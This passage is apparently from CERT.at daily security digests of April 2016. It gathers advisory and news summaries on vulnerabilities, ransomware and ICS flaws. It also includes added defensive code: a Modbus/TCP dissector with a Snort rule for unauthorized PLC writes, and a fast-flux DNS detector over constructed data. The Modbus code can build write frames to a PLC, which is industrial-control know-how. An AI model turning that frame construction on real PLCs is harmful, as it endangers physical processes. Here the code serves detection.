Equipped with a small OLED screen; firmware made available for download
---------------------------------------------
http://derstandard.at/2000034841151
*** Boost - Moderately Critical - Information Disclosure - SA-CONTRIB-2016-021 ***
---------------------------------------------
This module provides static page caching for Drupal enabling a very significant performance and scalability boost for sites that receive mostly anonymous traffic. The module doesn't prevent form cache from leaking between anonymous users which ..
---------------------------------------------
https://www.drupal.org/node/2705765
*** Features - Less Critical - Denial of Service (DoS) - SA-CONTRIB-2016-020 ***
---------------------------------------------
This module enables you to organize and export configuration data. The module doesn't sufficiently protect the admin/structure/features/cleanup path with a token. If an attacker can trick an admin with the ..
---------------------------------------------
https://www.drupal.org/node/2705637
*** Badlock: A Lateral Concern ***
---------------------------------------------
Yesterday, what seems like the entire InfoSec industry was underwhelmed when Badlock was finally disclosed and, apparently, didn't live up to its billing. While we agree that the month-long buildup to the disclosure, and flashy logo were unnecessary, we'd like to explain why we think this vulnerability will end up providing malicious actors with a ..
---------------------------------------------
https://labsblog.f-secure.com/2016/04/14/badlock-a-lateral-concern/
*** Snort Lab: Custom SCADA Protocol IDS Signatures ***
---------------------------------------------
In this lab, you are going to learn how to create custom Snort signatures for the Modbus/TCP protocol. First, let's take some time to examine the Modbus TCP Target system. Start the Modbus TCP PLC Target VM. This target simulates ..
---------------------------------------------
http://resources.infosecinstitute.com/snort-lab-custom-scada-protocol-ids-s…
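Before writing a Snort signature for a protocol it helps to have the framing and the detection logic in hand. The following is an added example, not material from the lab: a small Modbus/TCP dissector plus the rule logic a signature would encode (writes to the PLC from anything other than the engineering workstation, exception responses, malformed frames), run over constructed frames. The PLC, host addresses and the engineering-host allow-list are assumptions for the example.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Function codes from the Modbus Application Protocol specification.
READ_CODES = {1: "Read Coils", 2: "Read Discrete Inputs",
              3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_CODES = {5: "Write Single Coil", 6: "Write Single Register",
               15: "Write Multiple Coils", 16: "Write Multiple Registers"}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes


def parse_modbus_tcp(payload: bytes) -> ModbusFrame:
    """Dissect one Modbus/TCP ADU: a 7-byte MBAP header followed by the PDU.

    MBAP = transaction id (2) | protocol id (2, always 0) | length (2) | unit id (1);
    the length field counts the unit id plus the PDU. The PDU starts with the
    function code, which therefore always sits at byte offset 7 of the payload.
    """
    if len(payload) < 8:
        raise ValueError("too short for MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", payload[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus")
    if length != len(payload) - 6:
        raise ValueError(f"MBAP length {length} does not match payload ({len(payload) - 6})")
    return ModbusFrame(tid, uid, payload[7], payload[8:])


def build_modbus_tcp(tid: int, uid: int, function_code: int, data: bytes) -> bytes:
    """Encode a request ADU; used here only to construct sample traffic."""
    pdu = bytes([function_code]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, uid) + pdu


def inspect(src_ip: str, payload: bytes, engineering_hosts: Set[str]) -> Optional[str]:
    """Signature logic: alert on write function codes from hosts that are not the
    known engineering workstations, on exception responses (fc | 0x80) and on
    frames that do not parse. Returns the alert text or None."""
    try:
        frame = parse_modbus_tcp(payload)
    except ValueError as exc:
        return f"MALFORMED Modbus/TCP from {src_ip}: {exc}"
    fc = frame.function_code
    if fc & 0x80:
        code = frame.data[0] if frame.data else None
        return f"EXCEPTION response to fc={fc & 0x7f} (exception code {code}) from {src_ip}"
    if fc in WRITE_CODES and src_ip not in engineering_hosts:
        return f"WRITE {WRITE_CODES[fc]} (fc={fc}) from non-engineering host {src_ip}"
    return None


# Constructed traffic for an assumed PLC (unit id 1, 10.0.0.50) and an assumed
# engineering workstation 10.0.0.2; none of this is captured from the lab VM.
ENGINEERING_HOSTS = {"10.0.0.2"}
SAMPLE_TRAFFIC: List[Tuple[str, bytes]] = [
    ("10.0.0.2", build_modbus_tcp(1, 1, 3, b"\x00\x00\x00\x0a")),   # read 10 holding registers
    ("10.0.0.2", build_modbus_tcp(2, 1, 6, b"\x00\x10\x12\x34")),   # write single register, allowed host
    ("10.0.0.9", build_modbus_tcp(3, 1, 6, b"\x00\x10\xff\xff")),   # same write from an unknown host
    ("10.0.0.50", bytes.fromhex("000400000003018602")),             # exception: illegal data address
    ("10.0.0.9", b"\x00\x05\x00\x00"),                              # truncated frame
]


def run(traffic=SAMPLE_TRAFFIC, engineering_hosts=ENGINEERING_HOSTS) -> List[str]:
    """Apply inspect() to every frame and return the alerts in order."""
    return [alert for src, payload in traffic if (alert := inspect(src, payload, engineering_hosts))]


if __name__ == "__main__":
    for line in run():
        print(line)
```

The write-from-unknown-host check maps directly onto a content rule, because the function code is at a fixed offset: `alert tcp !10.0.0.2 any -> 10.0.0.50 502 (msg:"Modbus Write Single Register from unknown host"; flow:to_server,established; content:"|06|"; offset:7; depth:1; sid:1000001;)`. Offset matching only holds for one ADU per TCP segment; Snort's Modbus preprocessor (available since 2.9.2, with the `modbus_func` and `modbus_unit` rule options) handles the framing for you and is the better choice once the logic is worked out.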
*** East European Criminal Fastflux Infrastructure ***
---------------------------------------------
Fast flux networks allow miscreants to make their network more resistant against takedowns. By updating and changing the A records of a domain rapidly, there is a constant changing list of IPs hosting the domain involved, ..
---------------------------------------------
https://blog.team-cymru.org/2016/04/east-european-criminal-fastflux-infrast…
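A minimal detector for the behaviour described above, added here as an example and not taken from the Team Cymru post: rapidly changing, short-TTL A records spread across several networks. The resolver log, domain names and thresholds are constructed for the example, and a /24 prefix stands in for the ASN lookup you would do against a real BGP table.

```python
from collections import defaultdict
from ipaddress import ip_network
from typing import Dict, List, Tuple

# Constructed resolver log in the form "<epoch> <qname> <rtype> <rdata> ttl=<seconds>".
# Domains and addresses are made up (RFC 5737 documentation ranges), not observations.
SAMPLE_LOG = """
1460620800 fluxy.example A 192.0.2.10 ttl=60
1460620860 fluxy.example A 198.51.100.7 ttl=60
1460620920 fluxy.example A 203.0.113.44 ttl=60
1460620980 fluxy.example A 192.0.2.200 ttl=60
1460621040 fluxy.example A 198.51.100.99 ttl=60
1460621100 fluxy.example A 203.0.113.8 ttl=60
1460621160 fluxy.example A 192.0.2.77 ttl=60
1460621220 fluxy.example A 198.51.100.150 ttl=60
1460620800 cdn.example A 203.0.113.1 ttl=60
1460620860 cdn.example A 203.0.113.2 ttl=60
1460620920 cdn.example A 203.0.113.3 ttl=60
1460620980 cdn.example A 203.0.113.4 ttl=60
1460621040 cdn.example A 203.0.113.5 ttl=60
1460621100 cdn.example A 203.0.113.6 ttl=60
1460620800 static.example A 192.0.2.50 ttl=3600
1460621100 static.example AAAA 2001:db8::1 ttl=3600
1460624400 static.example A 192.0.2.50 ttl=3600
"""

Record = Tuple[int, str, str, int]   # (epoch, qname, ip, ttl)


def parse_log(text: str) -> List[Record]:
    """Turn the log lines into records, keeping only A answers (the records a flux network rotates)."""
    records = []
    for line in text.strip().splitlines():
        ts, qname, rtype, rdata, ttl = line.split()
        if rtype != "A":
            continue
        records.append((int(ts), qname.lower().rstrip("."), rdata, int(ttl.split("=", 1)[1])))
    return records


def summarize(records: List[Record], prefix_len: int = 24) -> Dict[str, dict]:
    """Per domain: distinct IPs, distinct networks (a /24 stand-in for the ASN
    lookup you would do with a real BGP table), observed TTLs and the time span."""
    stats = defaultdict(lambda: {"ips": set(), "nets": set(), "ttls": [], "first": None, "last": None})
    for ts, qname, ip, ttl in records:
        s = stats[qname]
        s["ips"].add(ip)
        s["nets"].add(str(ip_network(f"{ip}/{prefix_len}", strict=False)))
        s["ttls"].append(ttl)
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    return stats


def is_fast_flux(s: dict, min_ips: int = 5, min_nets: int = 3, max_ttl: int = 300) -> bool:
    """Heuristic: many distinct addresses, spread over several networks, all with
    short TTLs. Network diversity is what separates flux from a CDN, which also
    rotates short-TTL A records but inside its own address space."""
    return (len(s["ips"]) >= min_ips
            and len(s["nets"]) >= min_nets
            and max(s["ttls"]) <= max_ttl)


def find_fast_flux(text: str, **thresholds) -> List[str]:
    """Return the sorted list of domains in the log that trip the heuristic."""
    return sorted(d for d, s in summarize(parse_log(text)).items() if is_fast_flux(s, **thresholds))


if __name__ == "__main__":
    for domain, s in summarize(parse_log(SAMPLE_LOG)).items():
        print(f"{domain}: {len(s['ips'])} IPs, {len(s['nets'])} nets, max TTL {max(s['ttls'])}s,"
              f" flux={is_fast_flux(s)}")
```

The thresholds are deliberately loose and the /24 granularity is crude; with an ASN feed the network-diversity test becomes much sharper, and in practice you would also watch the NS records, since the same infrastructures rotate those too. The point of the example is the shape of the test, not the numbers.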
*** USB: Digital signatures protect against malicious or poor-quality devices ***
---------------------------------------------
USB devices with a Type-C connector are to identify themselves with cryptographic certificates in future, in order to prevent malware attacks and problems caused by incompatible power supplies.
---------------------------------------------
http://heise.de/-3173701
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 12-04-2016 18:00 − Wednesday 13-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** [R1] Nessus < 6.6 Fixes Two Vulnerabilities ***
---------------------------------------------
Tenable recently worked with Synacktiv to perform security testing for Nessus, as part of an ongoing initiative to proactively address security issues. During the test, their team found two issues that may impact a Nessus vulnerability scanner. Both issues require user authentication to exploit:
CVE-2016-82012 - Stored XSS
CVE-2016-82013 - XML External Entity (XXE) Expansion DoS
---------------------------------------------
http://www.tenable.com/security/tns-2016-08
*** UPDATE: Security Updates Available for Adobe Flash Player (APSB16-10) ***
---------------------------------------------
A Security Bulletin (APSB16-10) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1334
*** Security Bulletins Posted ***
---------------------------------------------
Security Bulletins for the Adobe Creative Cloud Desktop Application (APSB16-11) as well as RoboHelp Server (APSB16-12) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1336
*** MS16-APR - Microsoft Security Bulletin Summary for April 2016 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS16-APR
*** ZeuS Banking Trojan Resurfaces As Atmos Variant ***
---------------------------------------------
Atmos banking malware has perilous pedigree that includes Citadel and ZeuS.
---------------------------------------------
http://threatpost.com/zeus-banking-trojan-resurfaces-as-atmos-variant/11734…
*** Website Ransomware - CTB-Locker Goes Blockchain ***
---------------------------------------------
During the last couple of years, website ransomware has become one of the most actively developing types of malware. After the infamous fake anti-viruses, this is the second most prominent wave of malware that makes money by directly selling 'malware removal' services to users of infected computers.
---------------------------------------------
https://blog.sucuri.net/2016/04/website-ransomware-ctb-locker-goes-blockcha…
*** Badlock Vulnerability Falls Flat Against Its Hype ***
---------------------------------------------
The much anticipated Badlock vulnerability wasn't in the SMB protocol after all, but in SAM and LSAD and exposed Windows machines to privilege escalation.
---------------------------------------------
http://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117…
*** Cisco Unity Connection Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of the affected system.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** MSRT April release features Bedep detection ***
---------------------------------------------
As part of our ongoing effort to provide better malware protection, the Microsoft Malicious Software Removal Tool (MSRT) release this April will include detections for: Win32/Bedep, Trojan family Win32/Upatre, Trojan family Ransom:MSIL/Samas [...] In this blog, we'll focus on the Bedep family of trojans.
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-feat…
*** S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8442
*** Patch day: Microsoft plugs 13 holes, Adobe takes it easy ***
---------------------------------------------
Microsoft provides security patches for six vulnerabilities rated critical and seven rated important in Windows & Co. Adobe this month fixes just one critical and one important vulnerability.
---------------------------------------------
http://heise.de/-3171881
*** Badlock ***
---------------------------------------------
Last night Microsoft and the Samba project released patches for the long-announced (and in some quarters media-hyped) so-called "Badlock" bug (CVE-2016-0128) [...] In substance it is not really dramatic: a man-in-the-middle could take over an SMB connection. Since SMB connections are normally only established within local networks or via VPN, the impact is limited.
---------------------------------------------
http://www.cert.at/services/blog/20160413110435-1730.html
*** Siemens Industrial Products glibc Library Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a buffer overflow vulnerability in the glibc library affecting several of the Siemens industrial products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-103-01
*** Siemens SCALANCE S613 Denial-of-Service Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a resource exhaustion vulnerability that causes a denial-of-service condition in the Siemens SCALANCE S613 device.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-103-02
*** Siemens Industrial Products DROWN Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a DROWN attack that can affect some Siemens industrial products under certain conditions.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-103-03
*** Honeywell Uniformance PHD Denial Of Service ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on March 10, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a denial-of-service vulnerability in the Uniformance Process History Database (PHD).
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-070-02
*** Broken IBM Java Patch Prompts Another Disclosure ***
---------------------------------------------
Current versions of IBM SDK 7 and SDK 8 remain vulnerable to a 2013 Java vulnerability. Security Explorations discovered the original patch is broken and disclosed details on the flaw and a proof-of-concept exploit.
---------------------------------------------
http://threatpost.com/broken-ibm-java-patch-prompts-another-disclosure/1173…
*** DFN-CERT-2016-0601: NVIDIA GPU driver: multiple vulnerabilities allow, among other things, privilege escalation ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0601/
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 11-04-2016 18:00 − Tuesday 12-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Manamecrypt - a ransomware that takes a different route ***
---------------------------------------------
Hardly a week passes these days without a new family of ransomware making the headlines. This week our analysts are taking apart Manamecrypt, also referred to as CryptoHost. Basically, Manamecrypt is a ransomware Trojan horse, but it differs from other ransomware families in a number of aspects. For ..
---------------------------------------------
https://blog.gdatasoftware.com/2016/04/28234-manamecrypt-a-ransomware-that-…
*** Of IP addresses, toilet bowls and a remote farm ***
---------------------------------------------
Kansas is the heart of cybercrime, at least if you believe an application that maps IP addresses to locations. In reality, innocent people live there who now receive lots of angry phone calls and toilet bowls.
---------------------------------------------
http://www.golem.de/news/skurrile-belaestigungen-von-ip-adressen-kloschuess…
*** KickassTorrent touts adoption of two-factor authentication ***
---------------------------------------------
A torrent site has added an extra layer of security for users logging in.
---------------------------------------------
http://www.scmagazine.com/kickasstorrent-touts-adoption-of-two-factor-authe…
*** Rokku Ransomware shows possible link with Chimera ***
---------------------------------------------
Rokku is yet another ransomware, discovered in recent weeks. Currently, its most common distribution method is spam where a malicious executable is dropped by a VB script attached to an e-mail. The building blocks ..
---------------------------------------------
https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/
*** Ramdo click-fraud malware uses evasive maneuvers to draw first blood from researchers ***
---------------------------------------------
A thorough dissection of the click-fraud malware Ramdo shows a constantly evolving threat whose capabilities now include traffic encryption, random domain generation and improved virtualization detection.
---------------------------------------------
http://www.scmagazine.com/ramdo-click-fraud-malware-uses-evasive-maneuvers-…
*** Websites take control of USB devices: Googlers propose WebUSB API ***
---------------------------------------------
What could possibly go wrong? Wait, what could possibly go right? Two Google engineers have drafted a ..
---------------------------------------------
www.theregister.co.uk/2016/04/11/google_posts_usb_devices_tool/
*** Half of people plug in USB drives they find in the parking lot ***
---------------------------------------------
Why do we even bother with security software? A new study has found that almost half the people who pick up a USB stick they happen across in a parking lot plug said drives into their PCs.
---------------------------------------------
www.theregister.co.uk/2016/04/11/half_plug_in_found_drives/
*** DSA-3547 imagemagick - security update ***
---------------------------------------------
Several vulnerabilities were discovered in Imagemagick, a program suite for image manipulation. This update fixes a large number of potential security problems such as null-pointer access and buffer-overflows that might lead to memory leaks or denial of service. None of these security problems have a CVE number assigned.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3547
*** Atmos, the Citadel Trojan successor is in the wild ***
---------------------------------------------
Security experts from the Heimdal Security firm are issuing an alert on the Atmos malware which is the successor of the dreaded Citadel Trojan. Months ago, the author of the dreaded Citadel malware was sentenced to prison, but in ..
---------------------------------------------
http://securityaffairs.co/wordpress/46252/malware/atmos-trojan.html
*** TYPO3 CMS 6.2.20, 7.6.5 and 8.0.1 released ***
---------------------------------------------
https://typo3.org/news/article/typo3-cms-6220-765-and-801-released/
*** Snort Lab: Payload Detection Rules (PCRE) ***
---------------------------------------------
Until now, when we used Snort to look for certain content within the payload, we've always looked for some specific values. What if we wanted to look for something that we ..
---------------------------------------------
http://resources.infosecinstitute.com/snort-lab-payload-detection-rules-pcr…
*** Kernel: Oracle starts its own collection of Linux security patches ***
---------------------------------------------
To make updates easier to apply, Oracle wants to maintain branches of the Linux kernel that contain only patches for security vulnerabilities. What sounds good is a controversial idea, since the impact of kernel bugs is hard to assess.
---------------------------------------------
http://www.golem.de/news/kernel-oracle-startet-eigene-sammlung-von-linux-si…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 08-04-2016 18:00 − Monday 11-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Mumblehard takedown ends army of Linux servers from spamming ***
---------------------------------------------
One year after the release of the technical analysis of the Mumblehard Linux botnet, we are pleased to report that it is no longer active. ESET, in cooperation with the Cyber Police of Ukraine and CyS Centrum LLC, have taken down the Mumblehard botnet, stopping all its spamming activities since February 29th, 2016.
---------------------------------------------
http://www.welivesecurity.com/2016/04/07/mumblehard-takedown-ends-army-of-l…
*** Improvements to Safe Browsing Alerts for Network Administrators ***
---------------------------------------------
[...] Today, to provide Network Admins with even more useful information for protecting their users, we're adding URLs related to Unwanted Software, Malicious Software, and Social Engineering to the set of information we share. Here's the full set of data we share with network administrators: [...]
---------------------------------------------
https://security.googleblog.com/2016/04/improvements-to-safe-browsing-alert…
*** Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection ***
---------------------------------------------
Today we identified a new tool actively being used by the Locky ransomware family to evade detection and potentially infect endpoints. Unit 42 identified slight changes in Locky detonations through the AutoFocus threat intelligence service,...
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/04/unit42-ransomware-locky-…
*** FBI: $2.3 Billion Lost to CEO Email Scams ***
---------------------------------------------
The U.S. Federal Bureau of Investigation (FBI) this week warned about a "dramatic" increase in so-called "CEO fraud," e-mail scams in which the attacker spoofs a message from the boss and tricks someone at the organization into wiring funds to the fraudsters. The FBI estimates that these scams have cost organizations more than $2.3 billion in losses over the past three years.
---------------------------------------------
http://krebsonsecurity.com/2016/04/fbi-2-3-billion-lost-to-ceo-email-scams/
*** If only hackers could stop slurping test and dev databases. Wait, our phone is ringing ... ***
---------------------------------------------
Delphix thinks it has a solution. Exposure and loss of sensitive data is happening everywhere these days. One attack surface, as the jargon has it, is sensitive production data used in internal testing and development systems.
---------------------------------------------
http://www.theregister.co.uk/2016/04/08/delphix_data_breach_prevention/
*** Hikvision Digital Video Recorder Cross-Site Request Forgery ***
---------------------------------------------
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php
*** The Open-source vulnerabilities database (OSVDB) shuts down permanently ***
---------------------------------------------
The Open Sourced Vulnerability Database (OSVDB) has shut down permanently; the news was reported in a blog post published by the maintainers of the project. The decision was made in response to the lack of assistance from the industry.
---------------------------------------------
http://securityaffairs.co/wordpress/46129/security/osvdb-shuts-down.html
*** Windows XP refuses to die: 11 percent market share ***
---------------------------------------------
15 years after its release and two years after Microsoft ended support, Windows XP is still the third most common desktop operating system.
---------------------------------------------
http://futurezone.at/produkte/windows-xp-ist-nicht-totzukriegen-11-prozent-…
*** Hacker attack on DuMont media group: newspaper portals affected ***
---------------------------------------------
Systems shut down for security reasons
---------------------------------------------
http://derstandard.at/2000034558622
*** Moxa NPort Device Vulnerabilities ***
---------------------------------------------
NCCIC/ICS-CERT is aware of a public report of vulnerabilities affecting Moxa NPort 6110, 5100 series, and 6000 series devices. The Moxa NPort 6110 device is a Modbus/TCP to serial communication gateway. Moxa NPort 5100 series and 6000 series devices are serial-to-Ethernet converters.
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01
*** Learning from Bait and Switch Mobile Ransomware ***
---------------------------------------------
Porn and mobile malware; two things that can elicit the response "I didn't know how it got there" when someone finds them. We have recently caught sight of a mobile ransomware distributed by fake adult websites. However, much like a lot of things in the adult industry, this malware doesn't seem very logical. This piece showcases an incident that can help users understand mobile threats and aims to boost user awareness of these threats. We believe that securing knowledge
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/learning-from-ba…
*** Mindless Flash masses saved as exploit kit devs go astray with 0day ***
---------------------------------------------
Since-patched flaw was imperfectly targeted by incompetent crimeware. Malwarebytes hacker Jerome Segura says black hats have made a mess of efforts to unleash an Adobe Flash zero day vulnerability as part of their popular exploit kit, reducing the pool of potential victims.
---------------------------------------------
http://www.theregister.co.uk/2016/04/11/mindless_flash_masses_saved_as_magn…
*** Vista: The final year for the much-hated Windows version ***
---------------------------------------------
Support ends on April 11, 2017 - updating soon is recommended
---------------------------------------------
http://derstandard.at/2000034590249
*** New Threat Report ***
---------------------------------------------
Our latest threat report (PDF) is now available. The report discusses trends from the most prevalent cybersecurity threats we've seen during the year 2015. The Chain of Compromise (CoC) model is also introduced along with exploit kits, ransomware and more. Get it and more from: f-secure.com/labs
---------------------------------------------
https://labsblog.f-secure.com/2016/04/11/new-threat-report/
*** Petya ransomware cracked, password generator released ***
---------------------------------------------
A free tool is said to generate the password needed for decryption within a few seconds, its author promises. The first reports of success from Petya victims are already in.
---------------------------------------------
http://heise.de/-3167064
*** Nuclear Drops Tor Runs and Hides ***
---------------------------------------------
Yesterday we observed a new technique in the Nuclear kit and found a new payload and technique we've not seen before.
---------------------------------------------
http://blog.talosintel.com/2016/04/nuclear-tor.html
*** iMessage vulnerability allows access to all messages in plaintext ***
---------------------------------------------
A security vulnerability in the Messages app allows an attacker to read out the database containing all of the victim's communication as soon as the victim clicks a link sent to them. Apple fixed the vulnerability in OS X 10.11.4.
---------------------------------------------
http://www.heise.de/newsticker/meldung/iMessage-Schwachstelle-ermoeglicht-Z…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Netezza Host Management (CVE-2016-2842) ***
http://www.ibm.com/support/docview.wss?uid=swg21980927
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in RubyOnRails affects IBM BigFix Compliance Analytics. (CVE-2016-2097, CVE-2016-2098) ***
http://www.ibm.com/support/docview.wss?uid=swg21979720
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Samba affects IBM Spectrum Scale SMB protocol access method (CVE-2015-7560) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005727
---------------------------------------------
*** IBM Security Bulletin: Potential security vulnerability in IBM WebSphere Application Server if FIPS 140-2 is enabled (CVE-2016-0306) ***
http://www.ibm.com/support/docview.wss?uid=swg21979231
---------------------------------------------
*** Multiple vulnerabilities in OpenSSL affect AIX CVE-2016-0800 CVE-2016-0799 CVE-2016-0798 CVE-2016-0797 CVE-2016-0705 CVE-2016-0702 ***
http://www.ibm.com/support/
---------------------------------------------
*** IBM Security Bulletin: Cross-site scripting vulnerability in Liberty for Java for IBM Bluemix (CVE-2016-0283) ***
http://www.ibm.com/support/docview.wss?uid=swg21980429
---------------------------------------------
*** IBM Security Bulletin: IBM InfoSphere Information Governance Catalog is vulnerable to XXE Injection Attack (CVE-2016-0250) ***
http://www.ibm.com/support/docview.wss?uid=swg21977152
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect Tivoli Provisioning Manager for OS Deployment and Tivoli Provisioning Manager for Images (CVE-2016-0701, CVE-2015-3197) ***
http://www.ibm.com/support/docview.wss?uid=swg21979209
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in RubyOnRails affects IBM BigFix Compliance Analytics. (CVE-2015-7581, CVE-2016-0751, CVE-2016-0752, CVE-2016-0753) ***
http://www.ibm.com/support/docview.wss?uid=swg21979514
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Algorithmics Algo Risk Application and Counterparty Credit Risk (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21979757
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM BigFix Compliance Analytics. (CVE-2015-7575, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21979412
---------------------------------------------
*** IBM Security Bulletin: Financial Transaction Manager for Corporate Payment Services Access Control: Information Disclosure - Dojo Readmes (CVE-2016-0232) ***
http://www.ibm.com/support/docview.wss?uid=swg21977163
---------------------------------------------
*** IBM Security Bulletin: IBM DB2 LUW contains a denial of service vulnerability in which a malformed DRDA message may cause the DB2 server to terminate abnormally (CVE-2016-0211) ***
http://www.ibm.com/support/docview.wss?uid=swg21979984
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in libxml2 affects IBM BigFix Compliance Analytics. (CVE-2015-8317) ***
http://www.ibm.com/support/docview.wss?uid=swg21979515
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in libxml2 affects IBM BigFix Compliance Analytics. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500) ***
http://www.ibm.com/support/docview.wss?uid=swg21979513
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 07-04-2016 18:00 − Friday 08-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Swiss news site distributes malicious code: authorities and companies react ***
---------------------------------------------
Because malicious code is apparently being spread through it with increasing frequency, the Swiss federal administration and several large companies in the country have now blocked their employees' access to one of the country's largest news sites.
---------------------------------------------
http://heise.de/-3165287
*** Security Features Nobody Implements, (Thu, Apr 7th) ***
---------------------------------------------
Nobody may be wording it a bit strong. But adoption of these security features is certainly not taking off. If you can think of any features I forgot, then please comment: DNSSEC: That is probably my favorite issue. DNSSEC fixes one of the most important protocols. Without it, spoofing is always possible, and in some cases not even terribly hard. I think there are a number of reasons it is not implemented: If you implement it, there is a good chance that you make your domain non-reachable if you...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20921&rss
*** Open-source vulnerabilities database shuts down ***
---------------------------------------------
An open-source project dedicated to cataloguing a huge range of computer security flaws has closed its doors as of Tuesday, according to an announcement on the Open-Source Vulnerability Database's blog. The OSVDB, which was founded in 2002, was meant to be an independent repository for security information, allowing researchers to compare notes without oversight from large corporate software companies. One of its founders was HD Moore, a well-known hacker and security researcher, best known...
---------------------------------------------
http://www.cio.com/article/3053695/open-source-tools/open-source-vulnerabil…
*** SBA Research @ Cyber-Physical Systems Week 2016 ***
---------------------------------------------
We will participate in the events of CPS Week 2016 (Vienna, Austria, April 11-14, 2016). On Monday (April 11), Johanna Ullrich presents our work on "The Quest for Privacy in the Consumer Internet of Things" at the International Workshop on Consumers and the Internet of Things (ConsIoT 2016). A live webcast by the IoEtv will...
---------------------------------------------
https://www.sba-research.org/2016/04/08/sba-research-cyber-physical-systems…
*** Adobe fixes CVE-2016-1019 Zero-Day exploited to serve ransomware ***
---------------------------------------------
Cyber criminals are already exploiting the Flash Player zero-day vulnerability (CVE-2016-1019), affecting Flash Player 21.0.0.197 and earlier, which Adobe disclosed this week. Researchers at security firm Proofpoint confirmed that cyber gangs are exploiting it to distribute a ransomware dubbed Cerber.
---------------------------------------------
http://securityaffairs.co/wordpress/46107/malware/adobe-fixes-cve-2016-1019…
*** Breaking Semantic Image CAPTCHAs ***
---------------------------------------------
Interesting research: Suphannee Sivakorn, Iasonas Polakis and Angelos D. Keromytis, "I Am Robot: (Deep) Learning to Break Semantic Image CAPTCHAs": Abstract: Since their inception, captchas have been widely used for preventing fraudsters from performing illicit actions. Nevertheless, economic incentives have resulted in an arms race, where fraudsters develop automated solvers and, in turn, captcha services tweak their design to break the...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/04/breaking_semant.html
*** Lemur Vehicle Monitors BlueDriver LSB2 does not authenticate users for Bluetooth access ***
---------------------------------------------
The Lemur Vehicle Monitors BlueDriver is an aftermarket automotive device that connects to a vehicle's OBD-II port and provides information about the vehicle's performance. The BlueDriver does not require a PIN for Bluetooth access, which allows anyone in range to send arbitrary commands to the vehicle's CAN bus.
---------------------------------------------
https://www.kb.cert.org/vuls/id/615456
*** DSA-3545 cgit - security update ***
---------------------------------------------
Several vulnerabilities were discovered in cgit, a fast web frontend for git repositories written in C. A remote attacker can take advantage of these flaws to perform cross-site scripting, header injection or denial of service attacks.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3545
*** DSA-3544 python-django - security update ***
---------------------------------------------
Several vulnerabilities were discovered in Django, a high-level Python web development framework. The Common Vulnerabilities and Exposures project identifies the following problems:
